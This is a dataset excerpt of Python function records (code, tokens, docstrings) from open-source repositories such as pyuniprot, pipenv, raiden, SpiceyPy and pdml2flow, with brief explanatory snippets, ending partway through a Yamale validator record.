Dataset schema (column names with the viewer's length/class statistics):

repo: string (7 to 54 chars)
path: string (4 to 192 chars)
url: string (87 to 284 chars)
code: string (78 to 104k chars)
code_tokens: sequence
docstring: string (1 to 46.9k chars)
docstring_tokens: sequence
language: string (1 value)
partition: string (3 values)
cebel/pyuniprot
src/pyuniprot/manager/database.py
https://github.com/cebel/pyuniprot/blob/9462a6042c7c9295415a5eb589b77b27cb7c142b/src/pyuniprot/manager/database.py#L503-L514
def get_ec_numbers(cls, entry):
    """
    get list of models.ECNumber objects from XML node entry

    :param entry: XML node entry
    :return: list of models.ECNumber objects
    """
    ec_numbers = []

    for ec in entry.iterfind("./protein/recommendedName/ecNumber"):
        ec_numbers.append(models.ECNumber(ec_number=ec.text))

    return ec_numbers
[ "def", "get_ec_numbers", "(", "cls", ",", "entry", ")", ":", "ec_numbers", "=", "[", "]", "for", "ec", "in", "entry", ".", "iterfind", "(", "\"./protein/recommendedName/ecNumber\"", ")", ":", "ec_numbers", ".", "append", "(", "models", ".", "ECNumber", "(", "ec_number", "=", "ec", ".", "text", ")", ")", "return", "ec_numbers" ]
get list of models.ECNumber objects from XML node entry :param entry: XML node entry :return: list of models.ECNumber objects
[ "get", "list", "of", "models", ".", "ECNumber", "objects", "from", "XML", "node", "entry" ]
python
train
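The iterfind call above is plain ElementTree-style XPath. A minimal standalone sketch with a made-up UniProt-like snippet (models.ECNumber is pyuniprot's own model, so the sketch just collects the text values):

import xml.etree.ElementTree as ET

# Made-up entry node shaped like the path the function iterates over
entry = ET.fromstring(
    "<entry><protein><recommendedName>"
    "<ecNumber>1.1.1.1</ecNumber><ecNumber>2.7.11.1</ecNumber>"
    "</recommendedName></protein></entry>"
)
ec_numbers = [ec.text for ec in entry.iterfind("./protein/recommendedName/ecNumber")]
print(ec_numbers)  # ['1.1.1.1', '2.7.11.1']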
pypa/pipenv
pipenv/vendor/distlib/database.py
https://github.com/pypa/pipenv/blob/cae8d76c210b9777e90aab76e9c4b0e53bb19cde/pipenv/vendor/distlib/database.py#L580-L601
def _get_records(self):
    """
    Get the list of installed files for the distribution
    :return: A list of tuples of path, hash and size. Note that hash and
             size might be ``None`` for some entries. The path is exactly
             as stored in the file (which is as in PEP 376).
    """
    results = []
    r = self.get_distinfo_resource('RECORD')
    with contextlib.closing(r.as_stream()) as stream:
        with CSVReader(stream=stream) as record_reader:
            # Base location is parent dir of .dist-info dir
            #base_location = os.path.dirname(self.path)
            #base_location = os.path.abspath(base_location)
            for row in record_reader:
                missing = [None for i in range(len(row), 3)]
                path, checksum, size = row + missing
                #if not os.path.isabs(path):
                #    path = path.replace('/', os.sep)
                #    path = os.path.join(base_location, path)
                results.append((path, checksum, size))
    return results
[ "def", "_get_records", "(", "self", ")", ":", "results", "=", "[", "]", "r", "=", "self", ".", "get_distinfo_resource", "(", "'RECORD'", ")", "with", "contextlib", ".", "closing", "(", "r", ".", "as_stream", "(", ")", ")", "as", "stream", ":", "with", "CSVReader", "(", "stream", "=", "stream", ")", "as", "record_reader", ":", "# Base location is parent dir of .dist-info dir", "#base_location = os.path.dirname(self.path)", "#base_location = os.path.abspath(base_location)", "for", "row", "in", "record_reader", ":", "missing", "=", "[", "None", "for", "i", "in", "range", "(", "len", "(", "row", ")", ",", "3", ")", "]", "path", ",", "checksum", ",", "size", "=", "row", "+", "missing", "#if not os.path.isabs(path):", "# path = path.replace('/', os.sep)", "# path = os.path.join(base_location, path)", "results", ".", "append", "(", "(", "path", ",", "checksum", ",", "size", ")", ")", "return", "results" ]
Get the list of installed files for the distribution :return: A list of tuples of path, hash and size. Note that hash and size might be ``None`` for some entries. The path is exactly as stored in the file (which is as in PEP 376).
[ "Get", "the", "list", "of", "installed", "files", "for", "the", "distribution", ":", "return", ":", "A", "list", "of", "tuples", "of", "path", "hash", "and", "size", ".", "Note", "that", "hash", "and", "size", "might", "be", "None", "for", "some", "entries", ".", "The", "path", "is", "exactly", "as", "stored", "in", "the", "file", "(", "which", "is", "as", "in", "PEP", "376", ")", "." ]
python
train
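The row-padding idiom in _get_records deserves a closer look: RECORD rows may carry one, two, or three columns, and the list of Nones tops each row up to exactly three values so the tuple unpack never fails. A self-contained sketch with hypothetical rows:

rows = [
    ["pkg/__init__.py", "sha256=abc", "120"],
    ["pkg/data.bin", "sha256=def"],
    ["pkg/README"],
]
for row in rows:
    missing = [None for i in range(len(row), 3)]  # empty when the row is full
    path, checksum, size = row + missing
    print(path, checksum, size)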
raiden-network/raiden
raiden/transfer/mediated_transfer/mediator.py
https://github.com/raiden-network/raiden/blob/407ba15c72074e9de88771d6b9661ff4dc36bef5/raiden/transfer/mediated_transfer/mediator.py#L1056-L1107
def secret_learned(
        state: MediatorTransferState,
        channelidentifiers_to_channels: ChannelMap,
        pseudo_random_generator: random.Random,
        block_number: BlockNumber,
        block_hash: BlockHash,
        secret: Secret,
        secrethash: SecretHash,
        payee_address: Address,
) -> TransitionResult[MediatorTransferState]:
    """ Unlock the payee lock, reveal the lock to the payer, and if necessary
    register the secret on-chain.
    """
    secret_reveal_events = set_offchain_secret(
        state,
        channelidentifiers_to_channels,
        secret,
        secrethash,
    )
    set_offchain_reveal_state(
        state.transfers_pair,
        payee_address,
    )
    onchain_secret_reveal = events_for_onchain_secretreveal_if_closed(
        channelmap=channelidentifiers_to_channels,
        transfers_pair=state.transfers_pair,
        secret=secret,
        secrethash=secrethash,
        block_hash=block_hash,
    )
    offchain_secret_reveal = events_for_secretreveal(
        state.transfers_pair,
        secret,
        pseudo_random_generator,
    )
    balance_proof = events_for_balanceproof(
        channelidentifiers_to_channels,
        state.transfers_pair,
        pseudo_random_generator,
        block_number,
        secret,
        secrethash,
    )

    events = secret_reveal_events + offchain_secret_reveal + balance_proof + onchain_secret_reveal

    iteration = TransitionResult(state, events)

    return iteration
[ "def", "secret_learned", "(", "state", ":", "MediatorTransferState", ",", "channelidentifiers_to_channels", ":", "ChannelMap", ",", "pseudo_random_generator", ":", "random", ".", "Random", ",", "block_number", ":", "BlockNumber", ",", "block_hash", ":", "BlockHash", ",", "secret", ":", "Secret", ",", "secrethash", ":", "SecretHash", ",", "payee_address", ":", "Address", ",", ")", "->", "TransitionResult", "[", "MediatorTransferState", "]", ":", "secret_reveal_events", "=", "set_offchain_secret", "(", "state", ",", "channelidentifiers_to_channels", ",", "secret", ",", "secrethash", ",", ")", "set_offchain_reveal_state", "(", "state", ".", "transfers_pair", ",", "payee_address", ",", ")", "onchain_secret_reveal", "=", "events_for_onchain_secretreveal_if_closed", "(", "channelmap", "=", "channelidentifiers_to_channels", ",", "transfers_pair", "=", "state", ".", "transfers_pair", ",", "secret", "=", "secret", ",", "secrethash", "=", "secrethash", ",", "block_hash", "=", "block_hash", ",", ")", "offchain_secret_reveal", "=", "events_for_secretreveal", "(", "state", ".", "transfers_pair", ",", "secret", ",", "pseudo_random_generator", ",", ")", "balance_proof", "=", "events_for_balanceproof", "(", "channelidentifiers_to_channels", ",", "state", ".", "transfers_pair", ",", "pseudo_random_generator", ",", "block_number", ",", "secret", ",", "secrethash", ",", ")", "events", "=", "secret_reveal_events", "+", "offchain_secret_reveal", "+", "balance_proof", "+", "onchain_secret_reveal", "iteration", "=", "TransitionResult", "(", "state", ",", "events", ")", "return", "iteration" ]
Unlock the payee lock, reveal the lock to the payer, and if necessary register the secret on-chain.
[ "Unlock", "the", "payee", "lock", "reveal", "the", "lock", "to", "the", "payer", "and", "if", "necessary", "register", "the", "secret", "on", "-", "chain", "." ]
python
train
striglia/pyramid_swagger
pyramid_swagger/ingest.py
https://github.com/striglia/pyramid_swagger/blob/1dbc0b4f23e2e5f4ed575c116f3f7d0e83e30d45/pyramid_swagger/ingest.py#L247-L270
def ingest_resources(mapping, schema_dir):
    """Consume the Swagger schemas and produce a queryable datastructure.

    :param mapping: Map from resource name to filepath of its api declaration
    :type mapping: dict
    :param schema_dir: the directory schema files live inside
    :type schema_dir: string
    :returns: A list of mapping from :class:`RequestMatcher` to
        :class:`ValidatorMap`
    """
    ingested_resources = []
    for name, filepath in iteritems(mapping):
        try:
            ingested_resources.append(load_schema(filepath))
        # If we have trouble reading any files, raise a more user-friendly
        # error.
        except IOError:
            raise ApiDeclarationNotFoundError(
                'No api declaration found at {0}. Attempted to load the `{1}` '
                'resource relative to the schema_directory `{2}`. Perhaps '
                'your resource name and API declaration file do not '
                'match?'.format(filepath, name, schema_dir)
            )
    return ingested_resources
[ "def", "ingest_resources", "(", "mapping", ",", "schema_dir", ")", ":", "ingested_resources", "=", "[", "]", "for", "name", ",", "filepath", "in", "iteritems", "(", "mapping", ")", ":", "try", ":", "ingested_resources", ".", "append", "(", "load_schema", "(", "filepath", ")", ")", "# If we have trouble reading any files, raise a more user-friendly", "# error.", "except", "IOError", ":", "raise", "ApiDeclarationNotFoundError", "(", "'No api declaration found at {0}. Attempted to load the `{1}` '", "'resource relative to the schema_directory `{2}`. Perhaps '", "'your resource name and API declaration file do not '", "'match?'", ".", "format", "(", "filepath", ",", "name", ",", "schema_dir", ")", ")", "return", "ingested_resources" ]
Consume the Swagger schemas and produce a queryable datastructure. :param mapping: Map from resource name to filepath of its api declaration :type mapping: dict :param schema_dir: the directory schema files live inside :type schema_dir: string :returns: A list of mapping from :class:`RequestMatcher` to :class:`ValidatorMap`
[ "Consume", "the", "Swagger", "schemas", "and", "produce", "a", "queryable", "datastructure", "." ]
python
train
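The try/except illustrates a general pattern: catch a low-level IOError and re-raise a domain-specific error that names the file and resource so the user can fix the mismatch. A minimal sketch of the same idea, with hypothetical names:

class SchemaNotFoundError(Exception):
    """Raised when a mapped schema file cannot be read."""

def load_all(mapping, schema_dir):
    loaded = []
    for name, filepath in mapping.items():
        try:
            with open(filepath) as f:
                loaded.append(f.read())
        except IOError:
            # Re-raise with context the caller can actually act on
            raise SchemaNotFoundError(
                'No file at {0} for resource `{1}` (schema dir `{2}`)'.format(
                    filepath, name, schema_dir))
    return loaded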
ucsb-cs-education/hairball
hairball/__init__.py
https://github.com/ucsb-cs-education/hairball/blob/c6da8971f8a34e88ce401d36b51431715e1dff5b/hairball/__init__.py#L136-L158
def hairball_files(self, paths, extensions):
    """Yield filepath to files with the proper extension within paths."""
    def add_file(filename):
        return os.path.splitext(filename)[1] in extensions

    while paths:
        arg_path = paths.pop(0)
        if os.path.isdir(arg_path):
            found = False
            for path, dirs, files in os.walk(arg_path):
                dirs.sort()  # Traverse in sorted order
                for filename in sorted(files):
                    if add_file(filename):
                        yield os.path.join(path, filename)
                        found = True
            if not found:
                if not self.options.quiet:
                    print('No files found in {}'.format(arg_path))
        elif add_file(arg_path):
            yield arg_path
        elif not self.options.quiet:
            print('Invalid file {}'.format(arg_path))
            print('Did you forget to load a Kurt plugin (-k)?')
[ "def", "hairball_files", "(", "self", ",", "paths", ",", "extensions", ")", ":", "def", "add_file", "(", "filename", ")", ":", "return", "os", ".", "path", ".", "splitext", "(", "filename", ")", "[", "1", "]", "in", "extensions", "while", "paths", ":", "arg_path", "=", "paths", ".", "pop", "(", "0", ")", "if", "os", ".", "path", ".", "isdir", "(", "arg_path", ")", ":", "found", "=", "False", "for", "path", ",", "dirs", ",", "files", "in", "os", ".", "walk", "(", "arg_path", ")", ":", "dirs", ".", "sort", "(", ")", "# Traverse in sorted order", "for", "filename", "in", "sorted", "(", "files", ")", ":", "if", "add_file", "(", "filename", ")", ":", "yield", "os", ".", "path", ".", "join", "(", "path", ",", "filename", ")", "found", "=", "True", "if", "not", "found", ":", "if", "not", "self", ".", "options", ".", "quiet", ":", "print", "(", "'No files found in {}'", ".", "format", "(", "arg_path", ")", ")", "elif", "add_file", "(", "arg_path", ")", ":", "yield", "arg_path", "elif", "not", "self", ".", "options", ".", "quiet", ":", "print", "(", "'Invalid file {}'", ".", "format", "(", "arg_path", ")", ")", "print", "(", "'Did you forget to load a Kurt plugin (-k)?'", ")" ]
Yield filepath to files with the proper extension within paths.
[ "Yield", "filepath", "to", "files", "with", "the", "proper", "extension", "within", "paths", "." ]
python
train
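The in-place dirs.sort() is the interesting detail: os.walk yields directories in arbitrary order, and sorting dirs steers which subdirectories os.walk descends into next, so the whole traversal becomes deterministic. A standalone sketch of the technique:

import os

def sorted_files(root, extensions):
    """Yield files under root with a matching extension, in sorted order."""
    for path, dirs, files in os.walk(root):
        dirs.sort()  # in-place sort controls os.walk's descent order
        for filename in sorted(files):
            if os.path.splitext(filename)[1] in extensions:
                yield os.path.join(path, filename)

for match in sorted_files('.', {'.py'}):
    print(match)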
siznax/frag2text
frag2text.py
https://github.com/siznax/frag2text/blob/ccb5cb9007931cce25e39d598bd2e790123c12e6/frag2text.py#L77-L95
def frag2text(endpoint, stype, selector,
              clean=False, raw=False, verbose=False):
    """returns Markdown text of selected fragment.

    Args:
        endpoint: URL, file, or HTML string
        stype: { 'css' | 'xpath' }
        selector: CSS selector or XPath expression

    Returns:
        Markdown text

    Options:
        clean: cleans fragment (lxml.html.clean defaults)
        raw: returns raw HTML fragment
        verbose: show http status, encoding, headers
    """
    try:
        return main(endpoint, stype, selector, clean, raw, verbose)
    except StandardError as err:
        return err
[ "def", "frag2text", "(", "endpoint", ",", "stype", ",", "selector", ",", "clean", "=", "False", ",", "raw", "=", "False", ",", "verbose", "=", "False", ")", ":", "try", ":", "return", "main", "(", "endpoint", ",", "stype", ",", "selector", ",", "clean", ",", "raw", ",", "verbose", ")", "except", "StandardError", "as", "err", ":", "return", "err" ]
returns Markdown text of selected fragment.

Args:
    endpoint: URL, file, or HTML string
    stype: { 'css' | 'xpath' }
    selector: CSS selector or XPath expression

Returns:
    Markdown text

Options:
    clean: cleans fragment (lxml.html.clean defaults)
    raw: returns raw HTML fragment
    verbose: show http status, encoding, headers
[ "returns", "Markdown", "text", "of", "selected", "fragment", "." ]
python
train
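One caveat: StandardError exists only in Python 2; under Python 3 this except clause would itself raise a NameError. A hedged Python 3 rendering of the same catch-and-return behaviour (main stands in for the module's own entry point):

def frag2text_py3(endpoint, stype, selector, clean=False, raw=False, verbose=False):
    try:
        return main(endpoint, stype, selector, clean, raw, verbose)
    except Exception as err:  # closest Python 3 stand-in for StandardError
        return err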
EliotBerriot/lifter
lifter/query.py
https://github.com/EliotBerriot/lifter/blob/9b4394b476cddd952b2af9540affc03f2977163d/lifter/query.py#L512-L522
def locally(self):
    """
    Will execute the current queryset and pass it to the python backend
    so user can run query on the local dataset
    (instead of contacting the store)
    """
    from .backends import python
    from . import models

    store = python.IterableStore(values=self)
    return store.query(self.manager.model).all()
[ "def", "locally", "(", "self", ")", ":", "from", ".", "backends", "import", "python", "from", ".", "import", "models", "store", "=", "python", ".", "IterableStore", "(", "values", "=", "self", ")", "return", "store", ".", "query", "(", "self", ".", "manager", ".", "model", ")", ".", "all", "(", ")" ]
Will execute the current queryset and pass it to the python backend so user can run query on the local dataset (instead of contacting the store)
[ "Will", "execute", "the", "current", "queryset", "and", "pass", "it", "to", "the", "python", "backend", "so", "user", "can", "run", "query", "on", "the", "local", "dataset", "(", "instead", "of", "contacting", "the", "store", ")" ]
python
train
AndrewAnnex/SpiceyPy
spiceypy/spiceypy.py
https://github.com/AndrewAnnex/SpiceyPy/blob/fc20a9b9de68b58eed5b332f0c051fb343a6e335/spiceypy/spiceypy.py#L7784-L7815
def latsrf(method, target, et, fixref, lonlat):
    """
    Map array of planetocentric longitude/latitude coordinate pairs
    to surface points on a specified target body.

    The surface of the target body may be represented by a triaxial
    ellipsoid or by topographic data provided by DSK files.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/latsrf_c.html

    :param method: Computation method.
    :type method: str
    :param target: Name of target body.
    :type target: str
    :param et: Epoch in TDB seconds past J2000 TDB.
    :type et: float
    :param fixref: Body-fixed, body-centered target body frame.
    :type fixref: str
    :param lonlat: Array of longitude/latitude coordinate pairs.
    :type lonlat: A 2xM-Element Array of floats
    :return: Array of surface points.
    :rtype: A 3xM-Element Array of floats
    """
    method = stypes.stringToCharP(method)
    target = stypes.stringToCharP(target)
    et = ctypes.c_double(et)
    fixref = stypes.stringToCharP(fixref)
    npts = ctypes.c_int(len(lonlat))
    lonlat = stypes.toDoubleMatrix(lonlat)
    srfpts = stypes.emptyDoubleMatrix(3, npts.value)
    libspice.latsrf_c(method, target, et, fixref, npts, lonlat, srfpts)
    return stypes.cMatrixToNumpy(srfpts)
[ "def", "latsrf", "(", "method", ",", "target", ",", "et", ",", "fixref", ",", "lonlat", ")", ":", "method", "=", "stypes", ".", "stringToCharP", "(", "method", ")", "target", "=", "stypes", ".", "stringToCharP", "(", "target", ")", "et", "=", "ctypes", ".", "c_double", "(", "et", ")", "fixref", "=", "stypes", ".", "stringToCharP", "(", "fixref", ")", "npts", "=", "ctypes", ".", "c_int", "(", "len", "(", "lonlat", ")", ")", "lonlat", "=", "stypes", ".", "toDoubleMatrix", "(", "lonlat", ")", "srfpts", "=", "stypes", ".", "emptyDoubleMatrix", "(", "3", ",", "npts", ".", "value", ")", "libspice", ".", "latsrf_c", "(", "method", ",", "target", ",", "et", ",", "fixref", ",", "npts", ",", "lonlat", ",", "srfpts", ")", "return", "stypes", ".", "cMatrixToNumpy", "(", "srfpts", ")" ]
Map array of planetocentric longitude/latitude coordinate pairs to surface
points on a specified target body.

The surface of the target body may be represented by a triaxial ellipsoid
or by topographic data provided by DSK files.

https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/latsrf_c.html

:param method: Computation method.
:type method: str
:param target: Name of target body.
:type target: str
:param et: Epoch in TDB seconds past J2000 TDB.
:type et: float
:param fixref: Body-fixed, body-centered target body frame.
:type fixref: str
:param lonlat: Array of longitude/latitude coordinate pairs.
:type lonlat: A 2xM-Element Array of floats
:return: Array of surface points.
:rtype: A 3xM-Element Array of floats
[ "Map", "array", "of", "planetocentric", "longitude", "/", "latitude", "coordinate", "pairs", "to", "surface", "points", "on", "a", "specified", "target", "body", ".", "The", "surface", "of", "the", "target", "body", "may", "be", "represented", "by", "a", "triaxial", "ellipsoid", "or", "by", "topographic", "data", "provided", "by", "DSK", "files", ".", "https", ":", "//", "naif", ".", "jpl", ".", "nasa", ".", "gov", "/", "pub", "/", "naif", "/", "toolkit_docs", "/", "C", "/", "cspice", "/", "latsrf_c", ".", "html", ":", "param", "method", ":", "Computation", "method", ".", ":", "type", "method", ":", "str", ":", "param", "target", ":", "Name", "of", "target", "body", ".", ":", "type", "target", ":", "str", ":", "param", "et", ":", "Epoch", "in", "TDB", "seconds", "past", "J2000", "TDB", ".", ":", "type", "et", ":", "float", ":", "param", "fixref", ":", "Body", "-", "fixed", "body", "-", "centered", "target", "body", "frame", ".", ":", "type", "fixref", ":", "str", ":", "param", "lonlat", ":", "Array", "of", "longitude", "/", "latitude", "coordinate", "pairs", ".", ":", "type", "lonlat", ":", "A", "2xM", "-", "Element", "Array", "of", "floats", ":", "return", ":", "Array", "of", "surface", "points", ".", ":", "rtype", ":", "A", "3xM", "-", "Element", "Array", "of", "floats" ]
python
train
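A hedged usage sketch: with suitable kernels furnished (the metakernel path below is a placeholder), the wrapper maps longitude/latitude pairs in radians to one surface 3-vector per pair:

import math
import spiceypy as spice

spice.furnsh('metakernel.tm')  # placeholder: load kernels for target and frame
et = spice.str2et('2020-01-01T00:00:00')
lonlat = [[0.0, 0.0], [math.pi / 2, 0.0]]
points = spice.latsrf('ELLIPSOID', 'MARS', et, 'IAU_MARS', lonlat)
print(points.shape)  # expected (2, 3): one surface point per input pair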
townsenddw/jhubctl
jhubctl/hubs/hubs.py
https://github.com/townsenddw/jhubctl/blob/c8c20f86a16e9d01dd90e4607d81423417cc773b/jhubctl/hubs/hubs.py#L43-L57
def get(self, name=None):
    """Print a list of all jupyterHubs."""
    # Print a list of hubs.
    if name is None:
        hubs = self.get_hubs()
        print("Running Jupyterhub Deployments (by name):")
        for hub_name in hubs:
            hub = Hub(namespace=hub_name)
            data = hub.get_description()
            url = data['LoadBalancer Ingress']
            print(f' - Name: {hub_name}')
            print(f'   Url: {url}')
    else:
        hub = Hub(namespace=name)
        hub.get()
[ "def", "get", "(", "self", ",", "name", "=", "None", ")", ":", "# Print a list of hubs.", "if", "name", "is", "None", ":", "hubs", "=", "self", ".", "get_hubs", "(", ")", "print", "(", "\"Running Jupyterhub Deployments (by name):\"", ")", "for", "hub_name", "in", "hubs", ":", "hub", "=", "Hub", "(", "namespace", "=", "hub_name", ")", "data", "=", "hub", ".", "get_description", "(", ")", "url", "=", "data", "[", "'LoadBalancer Ingress'", "]", "print", "(", "f' - Name: {hub_name}'", ")", "print", "(", "f' Url: {url}'", ")", "else", ":", "hub", "=", "Hub", "(", "namespace", "=", "name", ")", "hub", ".", "get", "(", ")" ]
Print a list of all jupyterHubs.
[ "Print", "a", "list", "of", "all", "jupyterHubs", "." ]
python
train
apache/incubator-heron
heron/tools/tracker/src/python/handlers/clustershandler.py
https://github.com/apache/incubator-heron/blob/ad10325a0febe89ad337e561ebcbe37ec5d9a5ac/heron/tools/tracker/src/python/handlers/clustershandler.py#L39-L43
def get(self):
    """ get method """
    clusters = [statemgr.name for statemgr in self.tracker.state_managers]
    self.write_success_response(clusters)
[ "def", "get", "(", "self", ")", ":", "clusters", "=", "[", "statemgr", ".", "name", "for", "statemgr", "in", "self", ".", "tracker", ".", "state_managers", "]", "self", ".", "write_success_response", "(", "clusters", ")" ]
get method
[ "get", "method" ]
python
valid
bykof/billomapy
billomapy/billomapy.py
https://github.com/bykof/billomapy/blob/a28ba69fd37654fa145d0411d52c200e7f8984ab/billomapy/billomapy.py#L1755-L1768
def get_all_comments_of_incoming(self, incoming_id):
    """
    Get all comments of incoming
    This will iterate over all pages until it gets all elements.
    So if the rate limit exceeded it will throw an Exception and you will get nothing

    :param incoming_id: the incoming id
    :return: list
    """
    return self._iterate_through_pages(
        get_function=self.get_comments_of_incoming_per_page,
        resource=INCOMING_COMMENTS,
        **{'incoming_id': incoming_id}
    )
[ "def", "get_all_comments_of_incoming", "(", "self", ",", "incoming_id", ")", ":", "return", "self", ".", "_iterate_through_pages", "(", "get_function", "=", "self", ".", "get_comments_of_incoming_per_page", ",", "resource", "=", "INCOMING_COMMENTS", ",", "*", "*", "{", "'incoming_id'", ":", "incoming_id", "}", ")" ]
Get all comments of incoming

This will iterate over all pages until it gets all elements.
So if the rate limit exceeded it will throw an Exception and you will get nothing

:param incoming_id: the incoming id
:return: list
[ "Get", "all", "comments", "of", "incoming", "This", "will", "iterate", "over", "all", "pages", "until", "it", "gets", "all", "elements", ".", "So", "if", "the", "rate", "limit", "exceeded", "it", "will", "throw", "an", "Exception", "and", "you", "will", "get", "nothing" ]
python
train
thespacedoctor/fundamentals
fundamentals/tools.py
https://github.com/thespacedoctor/fundamentals/blob/1d2c007ac74442ec2eabde771cfcacdb9c1ab382/fundamentals/tools.py#L380-L387
def setup(
        self):
    """
    **Summary:**
        *setup the attributes and return*
    """
    return self.arguments, self.settings, self.log, self.dbConn
[ "def", "setup", "(", "self", ")", ":", "return", "self", ".", "arguments", ",", "self", ".", "settings", ",", "self", ".", "log", ",", "self", ".", "dbConn" ]
**Summary:** *setup the attributes and return*
[ "**", "Summary", ":", "**", "*", "setup", "the", "attributes", "and", "return", "*" ]
python
train
Enteee/pdml2flow
pdml2flow/conf.py
https://github.com/Enteee/pdml2flow/blob/bc9efe379b0b2406bfbbbd8e0f678b1f63805c66/pdml2flow/conf.py#L85-L180
def load(description, add_arguments_cb=lambda x: None, postprocess_conf_cb=lambda x: None):
    """Loads the global Conf object from command line arguments.

    Encode the next argument after +plugin to ensure that
    it does not start with a prefix_char
    """
    argparser = ArgumentParser(
        description=description,
        prefix_chars='-+'
    )
    argparser.add_argument(
        '--version',
        dest='PRINT_VERSION',
        action='store_true',
        help='Print version and exit'
    )
    add_arguments_cb(argparser)

    # set up plugin argument argparser
    plugin_argparser = argparser.add_argument_group('Plugins')
    plugins = {}

    def load_plugin_group(group):
        """Load all plugins from the given plugin_group."""
        for entry_point in iter_entry_points(group=group):
            name = str(entry_point).split(' =', 1)[0]
            plugin = entry_point.load()
            if isclass(plugin) \
                    and not plugin in Conf.SUPPORTED_PLUGIN_INTERFACES \
                    and any([
                        issubclass(plugin, supported_plugin_interface)
                        for supported_plugin_interface in Conf.SUPPORTED_PLUGIN_INTERFACES
                    ]):
                plugin_argparser.add_argument(
                    '+{}'.format(name),
                    dest='PLUGIN_{}'.format(name),
                    type=str,
                    nargs='?',
                    default=DEFAULT,
                    metavar='args'.format(name),
                    help=make_argparse_help_safe(
                        call_plugin(plugin, 'help')
                    )
                )
                # register plugin
                plugins[name] = plugin
            else:
                warning('Plugin not supported: {}'.format(name))

    load_plugin_group(Conf.PLUGIN_GROUP_BASE)
    if Conf.LOAD_PLUGINS:
        load_plugin_group(Conf.PLUGIN_GROUP)

    conf = vars(
        argparser.parse_args([
            v if i == 0 or v[0] == '+' or Conf.ARGS[i - 1][0] != '+'
            else b32encode(v.encode()).decode()
            for i, v in enumerate(Conf.ARGS)
        ])
    )
    postprocess_conf_cb(conf)

    # apply configuration
    Conf.set(conf)

    if Conf.PRINT_VERSION:
        print(
            'pdml2flow version {}'.format(Conf.VERSION),
            file=Conf.OUT
        )
        sys.exit(0)

    # initialize plugins
    Conf.PLUGINS = []
    for conf_name, args in conf.items():
        if conf_name.startswith('PLUGIN_') and args != DEFAULT:
            plugin_name = conf_name[7:]
            Conf.PLUGINS.append(
                # instantiate plugin
                plugins[plugin_name](*split(
                    b32decode(args.encode()).decode()
                    if args is not None
                    else ''
                ))
            )
[ "def", "load", "(", "description", ",", "add_arguments_cb", "=", "lambda", "x", ":", "None", ",", "postprocess_conf_cb", "=", "lambda", "x", ":", "None", ")", ":", "argparser", "=", "ArgumentParser", "(", "description", "=", "description", ",", "prefix_chars", "=", "'-+'", ")", "argparser", ".", "add_argument", "(", "'--version'", ",", "dest", "=", "'PRINT_VERSION'", ",", "action", "=", "'store_true'", ",", "help", "=", "'Print version and exit'", ")", "add_arguments_cb", "(", "argparser", ")", "# set up plugin argument argparser", "plugin_argparser", "=", "argparser", ".", "add_argument_group", "(", "'Plugins'", ")", "plugins", "=", "{", "}", "def", "load_plugin_group", "(", "group", ")", ":", "\"\"\"Load all plugins from the given plugin_group.\"\"\"", "for", "entry_point", "in", "iter_entry_points", "(", "group", "=", "group", ")", ":", "name", "=", "str", "(", "entry_point", ")", ".", "split", "(", "' ='", ",", "1", ")", "[", "0", "]", "plugin", "=", "entry_point", ".", "load", "(", ")", "if", "isclass", "(", "plugin", ")", "and", "not", "plugin", "in", "Conf", ".", "SUPPORTED_PLUGIN_INTERFACES", "and", "any", "(", "[", "issubclass", "(", "plugin", ",", "supported_plugin_interface", ")", "for", "supported_plugin_interface", "in", "Conf", ".", "SUPPORTED_PLUGIN_INTERFACES", "]", ")", ":", "plugin_argparser", ".", "add_argument", "(", "'+{}'", ".", "format", "(", "name", ")", ",", "dest", "=", "'PLUGIN_{}'", ".", "format", "(", "name", ")", ",", "type", "=", "str", ",", "nargs", "=", "'?'", ",", "default", "=", "DEFAULT", ",", "metavar", "=", "'args'", ".", "format", "(", "name", ")", ",", "help", "=", "make_argparse_help_safe", "(", "call_plugin", "(", "plugin", ",", "'help'", ")", ")", ")", "# register plugin", "plugins", "[", "name", "]", "=", "plugin", "else", ":", "warning", "(", "'Plugin not supported: {}'", ".", "format", "(", "name", ")", ")", "load_plugin_group", "(", "Conf", ".", "PLUGIN_GROUP_BASE", ")", "if", "Conf", ".", "LOAD_PLUGINS", ":", "load_plugin_group", "(", "Conf", ".", "PLUGIN_GROUP", ")", "conf", "=", "vars", "(", "argparser", ".", "parse_args", "(", "[", "v", "if", "i", "==", "0", "or", "v", "[", "0", "]", "==", "'+'", "or", "Conf", ".", "ARGS", "[", "i", "-", "1", "]", "[", "0", "]", "!=", "'+'", "else", "b32encode", "(", "v", ".", "encode", "(", ")", ")", ".", "decode", "(", ")", "for", "i", ",", "v", "in", "enumerate", "(", "Conf", ".", "ARGS", ")", "]", ")", ")", "postprocess_conf_cb", "(", "conf", ")", "# apply configuration", "Conf", ".", "set", "(", "conf", ")", "if", "Conf", ".", "PRINT_VERSION", ":", "print", "(", "'pdml2flow version {}'", ".", "format", "(", "Conf", ".", "VERSION", ")", ",", "file", "=", "Conf", ".", "OUT", ")", "sys", ".", "exit", "(", "0", ")", "# initialize plugins", "Conf", ".", "PLUGINS", "=", "[", "]", "for", "conf_name", ",", "args", "in", "conf", ".", "items", "(", ")", ":", "if", "conf_name", ".", "startswith", "(", "'PLUGIN_'", ")", "and", "args", "!=", "DEFAULT", ":", "plugin_name", "=", "conf_name", "[", "7", ":", "]", "Conf", ".", "PLUGINS", ".", "append", "(", "# instantiate plugin", "plugins", "[", "plugin_name", "]", "(", "*", "split", "(", "b32decode", "(", "args", ".", "encode", "(", ")", ")", ".", "decode", "(", ")", "if", "args", "is", "not", "None", "else", "''", ")", ")", ")" ]
Loads the global Conf object from command line arguments. Encode the next argument after +plugin to ensure that it does not start with a prefix_char
[ "Loads", "the", "global", "Conf", "object", "from", "command", "line", "arguments", "." ]
python
train
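The Base32 detour is the key trick: argparse treats any token starting with a prefix_char ('-' or '+') as an option, so raw plugin arguments like '-v --fast' would be swallowed. Base32 output uses only A-Z, 2-7 and '=', so it can never look like an option. A small demonstration:

from base64 import b32encode, b32decode

plugin_args = '-v --fast'
encoded = b32encode(plugin_args.encode()).decode()
print(encoded)  # alphanumeric, safe to pass where argparse expects a value
print(b32decode(encoded.encode()).decode())  # '-v --fast' round-trips intact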
23andMe/Yamale
yamale/validators/base.py
https://github.com/23andMe/Yamale/blob/0a75b4205624d9bccc52bda03efaf0d58c143c76/yamale/validators/base.py#L47-L67
def validate(self, value):
    """
    Check if ``value`` is valid.

    :returns: [errors] If ``value`` is invalid, otherwise [].
    """
